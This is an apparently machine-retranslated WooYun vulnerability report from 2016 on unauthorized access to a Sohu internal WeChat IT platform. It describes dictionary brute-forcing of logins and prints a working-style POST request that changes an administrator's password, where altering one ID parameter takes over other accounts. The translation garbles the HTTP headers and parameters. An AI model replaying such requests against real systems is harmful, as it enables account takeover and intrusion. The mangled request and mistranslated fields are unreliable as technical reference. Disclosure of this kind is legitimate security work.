漏洞标题 搜狐某内部系统未授权访问(可执行任意操作) 相关厂商 搜狐 漏洞作者 Aasron 提交时间 2016-05-01 08:35 公开时间 2016-06-15 09:40 漏洞类型 未授权访…
漏洞标题
搜狐的内部系统无权访问(可以执行任意操作)
相关制造商
搜狐
漏洞作者
Aasron
提交时间
2016-05-01 08: 35
公共时间
2016-06-15 09: 40
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
越权存取
漏洞详细信息
搜狐内部IT微信平台
http://wx.sohu-inc.com
您只修复了命令执行漏洞,但未修复未经授权的访问问题。
页
/index.jsp
是的
http://wx.sohu-inc.com/index.jsp
漏洞证明:
使用这些来制作字典并运行登录帐户。
在页面注销后,前台中没有验证机制。
背景本地帐户或域帐户密码可以被捕获和读取。

还有一个CSRF问题
POST/rAction!updateRole HTTP/1.1
主机: wx.sohu-inc.com
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; rv: 45.0)Gecko/20100101 Firefox/45.0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Accept-Language: zh-CN,zh; q=0.8,en-US; q=0.5,en; Q=0.3
Accept-Encoding: gzip,deflate
Referer:http://wx.sohu-inc.com/rAction!findRoles
Cookie: JSESSIONID=ABE2A34A2C8134233580BB74BE24D112
连接:关闭
内容类型: application/x-www-form-urlencoded
内容长度: 91
r.managerId=2及r.typeId=1&安培; r.managerEmail=管理员&安培; r.managerPwd=XXXX
要更改密码或执行其他操作(如删除),只需更改r.managerId参数即可。

这里有一些关于VPN问题的内容。

修理计划:
ASD
版权声明:请注明出处Aasron @乌云